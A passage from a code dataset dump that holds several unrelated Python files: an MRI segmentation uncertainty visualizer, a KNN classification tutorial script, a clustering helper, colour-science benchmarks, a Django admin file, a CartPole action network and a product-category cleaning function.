\"t2_prd_var_{:03d}.png\".format(epoch)), prd_var_canvas[1])\n imwrite(join(self._image_dir, \"t2_prd_unc_{:03d}.png\".format(epoch)), prd_unc_canvas[1])\n\n @staticmethod\n def _entropy(prd_mcs):\n mcs = np.repeat(prd_mcs, 2, -1)\n mcs[..., 0] = 1 - mcs[..., 1] # 10, 50, 192, 192, 64, 2\n return -np.sum(np.mean(mcs, 0) * np.log(np.mean(mcs, 0) + 1e-5), -1)\n\n @staticmethod\n def _prd_variance(log_var_mcs):\n return np.mean(np.exp(np.clip(log_var_mcs, -7, 7)), 0)[\n 0, ..., 0] # (nb_mc, nb_img, 192, 192, 64, 1) --> (nb_img, 192, 192, 64, 1)\n\n @staticmethod\n def _prd_uncertainty(mu_mcs, prd_var):\n # = Var(mu_mcs) + prd_var\n return np.mean(np.square(mu_mcs[..., 0]), 0) - np.square(np.mean(mu_mcs[..., 0], 0)) + prd_var\n\n def _get_bald_canvas(self, y_prd, bald):\n sx, sy, sz, ch = y_prd.shape[1:] # (50, 192, 192, 64, 1)\n dim = self._dim\n imgs_prd = 255 * np.repeat(np.expand_dims(_ALPHA * self._imgs, -1), 3, -1) + \\\n (1 - _ALPHA) * np.repeat(np.expand_dims(np.repeat(y_prd, self._nb_ch, -1), -1), 3, -1) * [255, 0, 0]\n # 50, 192, 192, 64, 3, 3\n\n bald = np.repeat(np.expand_dims(np.repeat(\n np.expand_dims(bald, -1), self._nb_ch, -1), -1), 3, -1) * [255, 0, 0] # 50, 192, 192, 64, 3\n bald = bald[:, 0]\n out = np.zeros((3 * y_prd.shape[0], sx, sy, self._nb_ch, 3)) # 3*12, 192, 192, 3, 3\n for i in range(len(imgs_prd)):\n out[3 * i] = self._imgs_tru[i, :, :, self._sidx[i], :, :]\n out[3 * i + 1] = imgs_prd[i, :, :, self._sidx[i], :, :]\n out[3 * i + 2] = bald[i, :, :, self._sidx[i], :, :]\n\n canvas = np.zeros((self._nb_ch, dim * sx, dim * sy, 3), dtype='uint8')\n count = 0\n for j in range(dim):\n for k in range(dim):\n canvas[:, (j * sx):(j * sx + sx), (k * sy):(k * sy + sy), :] = \\\n np.flip(out[count].transpose(2, 1, 0, 3), 1)\n count += 1\n return canvas\n\n def _get_entropy_canvas(self, y_prd, ent):\n return self._get_bald_canvas(y_prd, ent)\n\n def _get_prd_var_canvas(self, y_prd, prd_var):\n return self._get_bald_canvas(y_prd, prd_var)\n\n def _get_prd_unc_canvas(self, y_prd, prd_unc):\n return self._get_bald_canvas(y_prd, prd_unc)\n\n\nclass UncertaintyVisualizerDebug:\n def __init__(self, sess, data_gen, out_dir, nb_mc=5, nb_imgs=20, nb_ch=4):\n \"\"\"\n :param data_gen:\n :param str out_dir:\n :param int nb_mc\n :param int nb_imgs:\n \"\"\"\n self._image_dir = join(out_dir, 'images')\n self._nb_imgs = nb_imgs\n makedirs(self._image_dir, exist_ok=True)\n self._nb_mc = nb_mc\n self._data = None\n self._imgs = None\n self._imgs_tru = None\n self._imgs_tru_red = None\n self._imgs_tru_gr = None\n self._sidx = None\n self._nb_ch = nb_ch\n self._prep_data(sess, data_gen)\n self._save_gt_imgs()\n\n def __call__(self, sess, net, epoch):\n mus = []\n log_vars = []\n y_dummy = np.empty((1, 192, 192, 64, 1))\n for x in self._x_mc:\n mu, log_var = sess.run([net.predictor, net.log_variance], feed_dict={net.x: x, net.y: y_dummy, net.keep_prob: .5, net.class_weight: 1})\n mus.append(mu)\n log_vars.append(log_var)\n\n mus_mcs = np.asarray(mus)\n mus_mcs = mus_mcs.reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n log_var_mcs = np.asarray(log_vars).reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n y_prd = sigmoid(np.mean(mus_mcs, 0)) # nb_img, 192, 192, 64, 1\n bald = self._bald_uncertainty(sigmoid(mus_mcs))\n ent = self._entropy(sigmoid(mus_mcs))\n prd_var = self._prd_variance(log_var_mcs)\n var_mcs = self._var_mcs(sigmoid(mus_mcs))\n y_prd = y_prd[:, 0, ...] # 12, 1, 192, 192, 64, 1, 1 --> 12, 192, 192, 64, 1, 1\n \n y_prd[y_prd>=0.5] = 1\n y_prd[y_prd<0.5] = 0\n y_prd = y_prd.astype(np.int16)\n \n y_paint = []\n for i, prd in enumerate(y_prd):\n a = prd[..., 0]\n b = self._y[i,0,...,0]\n y_paint.append(ohe(paint_cca_img(a, b)))\n y_paint = np.asarray(y_paint)\n \n imgs_prd = np.repeat(np.expand_dims(self._imgs, -1), 3, -1)\n labels = np.repeat(np.expand_dims(np.repeat(y_prd, self._nb_ch, -1), -1), 3, -1)\n labels = imgs_prd.max() * labels\n imgs_prd[labels!=0]=0\n labels = [1,0,0]*labels\n imgs_prd[labels!=0] = labels[labels!=0] # 12, 192, 192, 64, 4, 3\n imgs_prd = np.flip(imgs_prd.transpose(0,4,2,1,3,5),2)\n \n imgs_prd_paint = np.repeat(np.expand_dims(self._imgs, -1), 3, -1)\n y_paint = np.repeat(np.expand_dims(y_paint,-2),self._nb_ch,-2) \n labels_paint = imgs_prd.max() * y_paint\n imgs_prd_paint[labels_paint.sum(-1) != 0] = 0\n imgs_prd_paint[labels_paint!=0] = labels_paint[labels_paint!=0]\n imgs_prd_paint = np.flip(imgs_prd_paint.transpose(0,4,2,1,3,5),2)\n \n bald = self._unc_canvas(bald)\n ent = self._unc_canvas(ent)\n prd_var = self._unc_canvas(prd_var)\n var_mcs = self._unc_canvas(var_mcs)\n\n for i, (iprd,iprd_paint) in enumerate(zip(imgs_prd, imgs_prd_paint)):\n imwrite(join(self._image_dir,str(i), \"{}_t1_{:03d}.png\".format(i,epoch)), iprd[0,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_t2_{:03d}.png\".format(i,epoch)), iprd[1,:,:,self._sidx[i]], )\n imwrite(join(self._image_dir,str(i), \"{}_flr_{:03d}.png\".format(i,epoch)), iprd[2,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i), \"{}_pdw_{:03d}.png\".format(i,epoch)), iprd[3,:,:,self._sidx[i]])\n\n imwrite(join(self._image_dir,str(i), \"{}_t1_paint_{:03d}.png\".format(i,epoch)), iprd_paint[0,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_t2_paint_{:03d}.png\".format(i,epoch)), iprd_paint[1,:,:,self._sidx[i]], )\n imwrite(join(self._image_dir,str(i), \"{}_flr_paint_{:03d}.png\".format(i,epoch)), iprd_paint[2,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i), \"{}_pdw_paint_{:03d}.png\".format(i,epoch)), iprd_paint[3,:,:,self._sidx[i]])\n \n imwrite(join(self._image_dir,str(i),\"{}_mi_{:03d}.png\".format(i,epoch)), bald[i,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_ent_{:03d}.png\".format(i,epoch)), ent[i,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_prdvar_{:03d}.png\".format(i,epoch)), prd_var[i,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_varmcs_{:03d}.png\".format(i,epoch)), var_mcs[i,:,:,self._sidx[i]])\n\n @staticmethod\n def _unc_canvas(x):\n x = x[:,0]\n x = np.repeat(np.expand_dims(x, -1),3,-1) # 12, 192, 192, 64,3\n x = [1,0,0] * np.flip(x.transpose(0,2,1,3,4),1)\n return x\n \n @staticmethod\n def _bald_uncertainty(prd):\n # https://arxiv.org/pdf/1703.02910.pdf\n mcs = np.repeat(prd, 2, -1)\n mcs[..., 0] = 1 - mcs[..., 1] # 10, nb_img, 192, 192, 64, 2\n\n entropy = -np.sum(np.mean(mcs, 0) * np.log(np.mean(mcs, 0) + 1e-5), -1)\n expected_entropy = -np.mean(np.sum(mcs * np.log(mcs + 1e-5), -1), 0)\n bald = entropy - expected_entropy\n return bald\n\n @staticmethod\n def _entropy(prd_mcs):\n mcs = np.repeat(prd_mcs, 2, -1)\n mcs[..., 0] = 1 - mcs[..., 1] # 10, 50, 192, 192, 64, 2\n return -np.sum(np.mean(mcs, 0) * np.log(np.mean(mcs, 0) + 1e-5), -1)\n\n @staticmethod\n def _prd_variance(log_var_mcs):\n return np.mean(np.exp(np.clip(log_var_mcs, -7, 7)), 0)[0, ..., 0] # (nb_mc, nb_img, 192, 192, 64, 1) --> (nb_img, 192, 192, 64, 1)\n \n @staticmethod\n def _var_mcs(prd_mcs):\n return np.var(prd_mcs, 0)[..., 0] # (nb_mc, nb_img, 192, 192, 64, 1) --> (nb_img, 192, 192, 64, 1)\n\n def _prep_data(self, sess, data_gen):\n print(\"preparing validation data... \")\n data = []\n xb = []\n yb = []\n i = 0\n x_valid, y_valid = data_gen.get_next()\n while len(yb) < self._nb_imgs:\n x, y = sess.run([x_valid, y_valid])\n ysum = y[0].sum()\n if ysum < 5:\n continue\n y = np.expand_dims(y[..., 0], -1)\n # remove lesions that are <=2 voxels (because they serve as an unfair comparison)\n y = remove_tiny_les(y)\n data.append((x, y))\n xb.append(x)\n yb.append(y)\n i += 1\n\n print('done')\n self._data = data\n\n x = np.asarray(xb) # nb_im, bs, 192, 192, 64, 4\n print('x.shape', x.shape)\n y = np.asarray(yb) # nb_im, bs, 192, 192, 64, 1\n self._y = y.astype(np.int16)\n\n self._x_mc = np.repeat(np.expand_dims(x[:, 0, ...], 0), self._nb_mc, 0). \\\n reshape((x.shape[0] * self._nb_mc,) + x.shape[2:]) # nb_mc*nb_im, 192, 192, 64, 3\n self._x_mc = np.expand_dims(self._x_mc, 1)\n \n self._imgs_tru = np.repeat(np.expand_dims(x[:, 0, ...], -1), 3, -1)\n self._imgs_raw = self._imgs_tru.copy()\n labels = self._imgs_tru.max() * np.repeat(np.expand_dims(np.repeat(y[:, 0, ...], self._nb_ch, -1), -1), 3, -1)\n self._imgs_tru[labels!=0]=0\n labels_red = [1,0,0]*labels\n labels_gr = [0,1,0]*labels\n self._imgs_tru_red = np.copy(self._imgs_tru)\n self._imgs_tru_gr = np.copy(self._imgs_tru)\n self._imgs_tru_red[labels_red!=0] = labels_red[labels_red!=0]\n self._imgs_tru_gr[labels_gr!=0] = labels_gr[labels_gr!=0]\n self._imgs = x[:, 0, ...] # 50, 192, 192, 64, 3\n self._set_sidx(y)\n \n def _save_gt_imgs(self):\n print('saving ground truth images...')\n for i, img_tru_red in enumerate(self._imgs_tru_red):\n makedirs(join(self._image_dir,str(i)), exist_ok=True)\n gr = np.flip(np.transpose(self._imgs_tru_gr[i,:,:,self._sidx[i]],(2,1,0,3)),1)\n red = np.flip(np.transpose(img_tru_red[:,:,self._sidx[i]],(2,1,0,3)),1)\n raw = np.flip(np.transpose(self._imgs_raw[i,:,:,self._sidx[i]],(2,1,0,3)),1)\n imwrite(join(self._image_dir, str(i), \"{}_t1_0gt_red.png\".format(i)), red[0])\n imwrite(join(self._image_dir, str(i), \"{}_t1_0gt_gr.png\".format(i)), gr[0])\n imwrite(join(self._image_dir, str(i), \"{}_t1_0gt_raw.png\".format(i)), raw[0])\n \n imwrite(join(self._image_dir, str(i), \"{}_t2_0gt_red.png\".format(i)), red[1])\n imwrite(join(self._image_dir, str(i), \"{}_t2_0gt_gr.png\".format(i)), gr[1])\n imwrite(join(self._image_dir, str(i), \"{}_t2_0gt_raw.png\".format(i)), raw[1])\n \n imwrite(join(self._image_dir, str(i), \"{}_flr_0gt_red.png\".format(i)), red[2])\n imwrite(join(self._image_dir, str(i), \"{}_flr_0gt_gr.png\".format(i)), gr[2])\n imwrite(join(self._image_dir, str(i), \"{}_flr_0gt_raw.png\".format(i)), raw[2])\n \n imwrite(join(self._image_dir, str(i), \"{}_pdw_0gt_red.png\".format(i)), red[3])\n imwrite(join(self._image_dir, str(i), \"{}_pdw_0gt_gr.png\".format(i)), gr[3])\n imwrite(join(self._image_dir, str(i), \"{}_pdw_0gt_raw.png\".format(i)), raw[3])\n print('done')\n \n def _set_sidx(self, y):\n y_imgs = y[:, 0, ..., 0]\n sidx = np.argmax(y_imgs.sum(1).sum(1), -1)\n sidx[sidx < _MIN_SLICE] = 30\n sidx[sidx > _MAX_SLICE] = 30\n self._sidx = sidx\n","sub_path":"tf_unet/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":25810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416006167","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 19:03:34 2019\n\n@author: vdunga\n\"\"\"\n#importing libraries\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as mp\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import confusion_matrix\n\n\n\n\n\n#importing DATASET\nDATASET = pd.read_csv('Social_Network_Ads.csv')\nXS = DATASET.iloc[:, 2:4].values\nY = DATASET.iloc[:, 4].values\n#l=XS[Y == 0, 0]\n\n#Y=Y.reshape(400,1)\n#feature scaling\n\nX_SC = StandardScaler()\n#Y_Sc=StandardScaler()\nX = X_SC.fit_transform(XS)\n#Y=Y_Sc.fit_transform(Y)\n\n#splitting DATASET into TRAIN and TEST sets\n\n\nX_TRAIN, X_TEST, Y_TRAIN, Y_TEST = train_test_split(X, Y, test_size=1/4, random_state=0)\n#Y_TRAIN1=Y_TRAIN.ravel().T\n\n#fitting logistic regression CLASSIFIER to DATASET\n\nCLASSIFIER = KNeighborsClassifier()\nCLASSIFIER.fit(X_TRAIN, Y_TRAIN)\n\n#predicting values\n\nY_PRED = CLASSIFIER.predict(X_TEST)\n\n#Making confusion matrix to know count of correct predictions\n\nCM = confusion_matrix(Y_TEST, Y_PRED)\n\n#visualizing the predictions vs actual\n\nX_SET, Y_SET = X_TRAIN, Y_TRAIN\n'''xx,yy=np.meshgrid(XS[:,0],XS[:,1])\nxx=xx*1000\nmp.contourf(xx,yy,yy,cmap = ListedColormap(('red', 'green','blue')))'''\nX1, X2 = np.meshgrid(np.arange(start=min(X_SET[:, 0])-1, stop=max(X_SET[:, 0])+1, step=0.01),\n np.arange(start=min(X_SET[:, 1])-1, stop=max(X_SET[:, 1])+1, step=0.01))\nmp.xlim(X1.min(), X1.max())\nmp.ylim(X2.min(), X2.max())\nmp.contourf(X1, X2, CLASSIFIER.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),\n alpha=0.75, cmap=ListedColormap(('red', 'green')))\nfor i, j in enumerate(np.unique(Y_SET)):\n mp.scatter(X_SET[Y_SET == j, 0], X_SET[Y_SET == j, 1],\n c=ListedColormap(('red', 'green'))(i), label=j)\nmp.title('Logistic Regression (TEST set)')\nmp.xlabel('Age')\nmp.ylabel('Estimated Salary')\nmp.legend()\nmp.show()\n\n'''print(list(enumerate(np.unique(Y_SET))))\na=np.array([X1.ravel(),X2.ravel()]).T\nr=X1.shape\nv = np.arange(1, 10)\nw = v.reshape(-1, 1)'''\n","sub_path":"Machine Learning A-Z Template Folder/Part 3 - Classification/Section 14 - Logistic Regression/Logistic_Regression/logreg.py","file_name":"logreg.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84839660","text":"import coordinate_based as cb\n\ndef create_clusters(locations, number_of_clusters=1):\n if number_of_clusters > 1:\n # each pair is 1 cluster\n clusters = []\n # clusters.append([(start_point, None)])\n for pair in locations:\n clusters.append([pair])\n\n while len(clusters) > number_of_clusters:\n # find closest clusters and merge\n min_cluster_distance = float('inf')\n min_cluster_index1 = -1\n min_cluster_index2 = -1\n for i in range(len(clusters) - 1):\n for j in range(i+1, len(clusters)):\n dist = cb.calculate_distance(clusters[i], clusters[j])\n if dist < min_cluster_distance:\n min_cluster_distance = dist\n min_cluster_index1 = i\n min_cluster_index2 = j\n # merge clusters\n clusters[min_cluster_index1].extend(clusters.pop(min_cluster_index2))\n\n # points merged, clusters formed\n print(\"found clusters: \", clusters)\n return clusters\n else:\n return [locations]\n\n\nif __name__ == '__main__':\n locs = [((58.384292, 26.722858), (58.398912, 26.713159)), ((58.378937, 26.67651), (58.36845, 26.708868)),\n ((58.384292, 26.722858), (58.394291, 26.712848))]\n result1 = create_clusters(locs, 1)\n result2 = create_clusters(locs, 2)\n result3 = create_clusters(locs, 3)","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"407036644","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"colour.models\" sub-package Benchmarks\n======================================\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport colour\n\nfrom benchmarks.factories.ijk import IJK_benchmark_factory\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2019-2021 - Colour Developers'\n__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-developers@colour-science.org'\n__status__ = 'Production'\n\n__all__ = ['YcbcrFactories']\n\nYcbcrFactories = {\n 'RGB_to_YcCbcCrc': colour.models.RGB_to_YcCbcCrc,\n 'RGB_to_YCbCr': colour.models.RGB_to_YCbCr,\n 'YcCbcCrc_to_RGB': colour.models.YcCbcCrc_to_RGB,\n 'YCbCr_to_RGB': colour.models.YCbCr_to_RGB,\n}\n\nIJK_benchmark_factory(YcbcrFactories, __name__)\n","sub_path":"benchmarks/colour/rgb/ycbcr.py","file_name":"ycbcr.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650519683","text":"from django.contrib import admin\nfrom mainapp.models import Product, ProductType\n# Register your models here.\n@admin.register(Product)\nclass PostAdmin(admin.ModelAdmin):\n list_display = ('product_id', 'product_name', 'product_type')\n\n ordering = ('product_id', 'product_type')\n\n\nadmin.site.register(ProductType)\n","sub_path":"mainapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519791623","text":"\"\"\" Jeonggwan Lee(leejk526@kaist.ac.kr)\n\"\"\"\nimport pickle\nimport ipdb\nimport gym\nimport numpy as np\nimport copy\nimport os\nimport tensorflow as tf\nimport random\n\nfrom record import get_test_record_title\nimport tf_utils\n\nTRANSITION = 15000\n#EPISODE = 20\n#MEMORY_SIZE = TRANSITION + 1000\nNUM_ACTION_ITER = 10000\nNUM_EVALUATION = 100\nNUM_EPISODES = 300\nMAX_STEPS = 300\nEPOCH_SIZE = 100\nBATCH_SIZE = 100\n\n\ndef generate_trajectories_from_expert_policy(env, n_trajectories=100):\n trajectories = []\n rewards_list = []\n for _ in range(n_trajectories):\n state = env.reset()\n trajectory = []\n rewards = 0\n for _ in range(TRANSITION):\n if state[2] < 0: # pole angle is minus(left)\n if state[3] < 0: # pole velocity is minus(left) => bad situation.\n action = 0 # go left\n else: # pole velocity is plus(right) => good situation.\n action = env.action_space.sample()\n else: # pole angle is plus(right)\n if state[3] < 0: # pole velocity is minus(left) => good situation.\n action = env.action_space.sample()\n else:\n action = 1 # go right\n next_state, reward, done, info = env.step(action)\n trajectory.append([state, action, reward, next_state, done])\n state = next_state\n rewards += 1\n if done:\n rewards_list.append(rewards)\n break\n # for j\n trajectories.append(trajectory)\n # for i\n print(\"expert policy average reward : {}\".format(sum(rewards_list)/n_trajectories))\n return trajectories\n\n\n\nclass DeepActionNetwork:\n \"\"\" Deep Action(Q) Network\n predict action from state\n\n loss : square(q_pred(s) - q(s, true_a)(=1) )\n \"\"\"\n def __init__(self,\n feature_op,\n state_size=4,\n action_size=2,\n n_h1=20,\n n_h2=9,\n learning_rate=0.05,\n scope=\"deep_action\"\n ):\n self.sess = tf.Session()\n self.feature_op = feature_op\n assert self.feature_op in [\"h1\", \"h2\", \"pred\"]\n self.learning_rate = learning_rate\n self.state_size = state_size\n self.action_size = action_size\n self.n_h1 = n_h1\n self.n_h2 = n_h2\n self.scope = scope\n self.meta_name = \"dan_cartpole_Nh1{}_Nh2{}.meta\".format(n_h1, n_h2)\n print(\"meta_name : {}\".format(self.meta_name))\n if self.isRestore():\n self.saver = tf.train.import_meta_graph(self.meta_name)\n self.saver.restore(self.sess, self.meta_name[:-5])\n self._load_network()\n else:\n theta = self._build_network()\n init_new_vars_op = tf.variables_initializer(theta)\n self.sess.run(init_new_vars_op)\n #self.sess.run(tf.global_variable_initializer())\n\n def _build_network(self):\n with tf.variable_scope(self.scope):\n self.state_input = tf.placeholder(tf.float32, [None, self.state_size], name=\"state_input\")\n self.action = tf.placeholder(tf.int32, [None], name=\"action\")\n self.fc1 = tf_utils.fc(self.state_input, self.n_h1, scope=\"fc1\",\n activation_fn=tf.nn.relu,\n initializer=tf.contrib.layers.variance_scaling_initializer(mode=\"FAN_IN\"))\n self.fc1_softmax = tf.nn.softmax(self.fc1, name=\"fc1_softmax\")\n self.fc2 = tf_utils.fc(self.fc1, self.n_h2, scope=\"fc2\",\n activation_fn=tf.nn.relu,\n initializer=tf.contrib.layers.variance_scaling_initializer(mode=\"FAN_IN\"))\n self.fc2_softmax = tf.nn.softmax(self.fc2, name=\"fc2_softmax\")\n self.q_value = tf_utils.fc(self.fc2, self.action_size, scope=\"q_value\", activation_fn=None)\n\n self.action_pred = tf.nn.softmax(self.q_value, name=\"action_prediction\")\n self.action_target = tf.one_hot(self.action, self.action_size, on_value=1.0, off_value=0.0,\n name=\"action_target\")\n self.loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.action_target,\n logits=self.action_pred, name=\"loss\")\n #self.loss = tf.reduce_mean(tf.square(tf.subtract(self.action_pred, self.action_target)))\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate, name=\"optimizer\")\n self.train_op = self.optimizer.minimize(self.loss, global_step=tf.train.get_global_step(),\n name=\"train_op\")\n new_variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.scope)\n return new_variables\n\n def _load_network(self):\n graph = tf.get_default_graph()\n nodes = graph.as_graph_def().node\n #for node in nodes:\n # print(node.name)\n #ops = graph.get_operations()\n #for op in ops:\n # print(op.name)\n self.state_input = graph.get_tensor_by_name(\"deep_action/state_input:0\")\n self.action = graph.get_tensor_by_name(\"deep_action/action:0\")\n self.fc1 = graph.get_tensor_by_name(\"deep_action/fc1/Relu:0\")\n self.fc1_softmax = graph.get_tensor_by_name(\"deep_action/fc1_softmax:0\")\n self.fc2 = graph.get_tensor_by_name(\"deep_action/fc2/Relu:0\")\n self.fc2_softmax = graph.get_tensor_by_name(\"deep_action/fc2_softmax:0\")\n self.q_value = graph.get_tensor_by_name(\"deep_action/q_value/Add:0\")\n self.action_pred = graph.get_tensor_by_name(\"deep_action/action_prediction:0\")\n self.action_target = graph.get_tensor_by_name(\"deep_action/action_target:0\")\n self.loss = graph.get_tensor_by_name(\"deep_action/loss:0\")\n #self.optimizer = graph.get_tensor_by_name(\"deep_action/optimizer:0\")\n self.train_op = graph.get_operation_by_name(\"deep_action/train_op\")\n\n def isRestore(self):\n if False:\n #if os.path.exists(self.meta_name):\n return True\n else:\n return False\n\n def _num_basis(self):\n return self.n_h2\n\n def learn(self, expert_trajectories=None):\n \"\"\" training from expert_trajectories \"\"\"\n\n if expert_trajectories is None:\n env = gym.make(\"CartPole-v0\")\n expert_trajectories = generate_trajectories_from_expert_policy(env, n_trajectories=100)\n\n expert_trajs_flat = []\n for i in range(len(expert_trajectories)):\n for j in range(len(expert_trajectories[i])):\n expert_trajs_flat.append(expert_trajectories[i][j])\n random.shuffle(expert_trajs_flat)\n\n batch_end = 0\n for i in range(NUM_ACTION_ITER):\n if batch_end + BATCH_SIZE > len(expert_trajs_flat):\n batch_end = 0\n random.shuffle(expert_trajs_flat)\n batch_expert_trajs = expert_trajs_flat[batch_end:batch_end+BATCH_SIZE]\n cur_state_batch = [s[0] for s in batch_expert_trajs]\n cur_action_batch = [s[1] for s in batch_expert_trajs]\n loss, _ = self.sess.run([self.loss, self.train_op], feed_dict={self.state_input:cur_state_batch,\n self.action:cur_action_batch})\n batch_end += BATCH_SIZE\n if i % 10 == 0:\n if type(loss) == np.float32:\n print(\"Deep Action Network Training iteration {}, {}\".format(i, loss))\n else:\n print(\"Deep Action Network Training iteration {}, {}\".format(i, sum(loss)/BATCH_SIZE))\n\n print(\"saveing our trained weights!!\")\n self.saver = tf.train.Saver()\n self.saver.save(self.sess, \"./\" + self.meta_name[:-5])\n\n def get_optimal_action(self, state):\n actions = self.sess.run(self.action_pred, feed_dict={self.state_input: [state]})\n return actions.argmax()\n\n def get_q_value(self, state):\n q_value = self.sess.run(self.q_value, feed_dict={self.state_input: [state]})\n return q_value\n\n def get_action_pred(self, state):\n action_pred = self.sess.run(self.action_pred, feed_dict={self.state_input: [state]})\n #q_value = self.sess.run(self.q_value, feed_dict={self.state_input: [state]})\n return action_pred\n\n def get_features(self, state):\n if self.feature_op == 'pred':\n features = self.sess.run(self.action_pred, feed_dict={self.state_input: [state]})\n elif self.feature_op == 'h2':\n features = self.sess.run(self.fc2_softmax, feed_dict={self.state_input: [state]})\n elif self.feature_op == 'h1':\n features = self.sess.run(self.fc1_softmax, feed_dict={self.state_input: [state]})\n return features\n\n def get_feature_dim(self):\n if self.feature_op == 'pred':\n return self.action_size\n elif self.feature_op == 'h2':\n return self.n_h2\n elif self.feature_op == 'h1':\n return self.n_h1\n \n def evaluate_multi_states(self, state):\n \"\"\" get features's multiple version\n \"\"\"\n if self.feature_op == 'pred':\n features = self.sess.run(self.action_pred, feed_dict={self.state_input: state})\n elif self.feature_op == 'h2':\n features = self.sess.run(self.fc2_softmax, feed_dict={self.state_input: state})\n elif self.feature_op == 'h1':\n features = self.sess.run(self.fc1_softmax, feed_dict={self.state_input: state})\n return features\n\n def test(self, env, isRender=True, num_test=100):\n print(\"Testing Deep Action Network... {} times\".format(num_test))\n timesteps = []\n for i in range(num_test):\n cur_state = env.reset()\n done = False\n t = 0\n while not done:\n t = t + 1\n if isRender:\n env.render()\n action = self.get_optimal_action(cur_state)\n next_state, reward, done, _ = env.step(action)\n cur_state = next_state\n if done:\n print(\"Test DAN {} : {} timesteps\".format(i, t))\n timesteps.append(t)\n break\n print(\"DAN average test results : {}\".format(sum(timesteps)/num_test))\n #end while\n #end for i\n \n","sub_path":"legacy_folder/deep_action_network.py","file_name":"deep_action_network.py","file_ext":"py","file_size_in_byte":10518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2040141","text":"import pandas as pd\nimport os\n\ndef transform_big_categories_to_uniform(is_show=True):\n '''\n Returns\n -------\n similar_categories : \n key: big-category for classification\n value: big-category(defined by supplier) defined by administrator,\n as the subordinate under the key (not very crucial for classification)\n\n is_show=True: 印出流程 is_show=True: 不印出流程\n\n This func would use other funcs:\n 1) _generate_paths\n 2) _get_raw_categories,\n 3) _get_splitted_categories,\n 4) _get_unclassified_categories,\n 5) _print_unclassified_categories\n\n By adjusting list: 'manual_def_categories' and dict: 'manual_def_dict' humanly,\n it can finally make up the dict: 'similar_categories',\n which contains the useful categories for classification as the key,\n and some useless categories as the value.\n '''\n # key: 自訂統一 big category 詞彙 value: 各家供應商 big category 詞彙\n\n raw_categories = _get_raw_categories()\n splitted_set = _get_splitted_categories(raw_categories)\n\n # Cleasing the whole big-categories to a dict which key of the dict is A ARBITRARY CATEGORY in a cluster of similar categories\n # 註: manual_def_categories 中分類的取名後方不加\"類\"(執行後結果會自動加上後字\"類\"),否則會有冗餘分類\n\n manual_def_categories = [\"上衣\",\"襯衫\",\"內衣\",\"外套\",\n\t\t\t\t\t\t \"下身\",\"配件\",\"洋裝\",\"運動\",\n\t\t\t\t\t\t \"鞋\",\"童裝\",\"嬰幼兒\",\"孕婦\"]\n\n manual_def_dict = {\"上衣\":{\"毛衣\",\"大衣\",\"針織衫\"},\n \t\t\t\t \"內衣\":{\"內著\",\"家居\",\"家居服\",\n \t\t\t\t\t\t \"家居類\",\"内衣\"},\n \t\t\t\t \"外套\":{\"外套類\",\"外套夾克\",\"外套\"},\n \t\t\t\t \"配件\":{\"皮夾\",\"絲巾\",\"圍巾\",\n \t\t\t\t\t\t \"皮帶\",\"帽子\",\"飾品\",\n \t\t\t\t\t\t \"包包\",\"其他\"},\n \t\t\t\t \"下身\":{\"連身褲\",\"裙子\"},\n \t\t\t\t \"童裝\":{\"kids_boy\",\"kids_girl\"},\n \t\t\t\t \"嬰幼兒\":{\"baby_girl\",\"baby_boy\"}}\n '''\n\n # 測試\n manual_def_categories = [\"上衣\",\"襯衫\",\"內衣\",\"外套\",\n \"嬰幼兒\",\"孕婦\",\"配件\"]\n manual_def_dict = {\"上衣\":{\"毛衣\",\"大衣\",\"針織衫\"},\n \t\t\t\t \"內衣\":{\"內著\",\"家居\",\"家居服\",\n \t\t\t\t\t\t \"家居類\",\"内衣\"},\n \"嬰幼兒\":{\"baby_boy\",\"baby_girl\"},\n \"配件\":{\"絲巾\",\"包包\",\"皮夾\"}}\n '''\n\n #tmp_cats = [cat.replace(\"類\",\"\") for cat in manual_def_categories]\n # (1) 先利用 manual_def_categories 設計出階層式的 similar_categories 雛形\n similar_categories = {f\"{key}類\": set([cat for raw_cat in raw_categories for cat in raw_cat.split(\"/\") if cat in key or key in cat]) for key in manual_def_categories}\n if is_show:\n print(\"===\"*12, \"\\n\", \"1. similar_categories 設計雛形 (依照手工添加的 manual_def_categories 所設計)\", \"===\"*12)\n print(\"similar_categories:\\n\", similar_categories, \"\\n\", 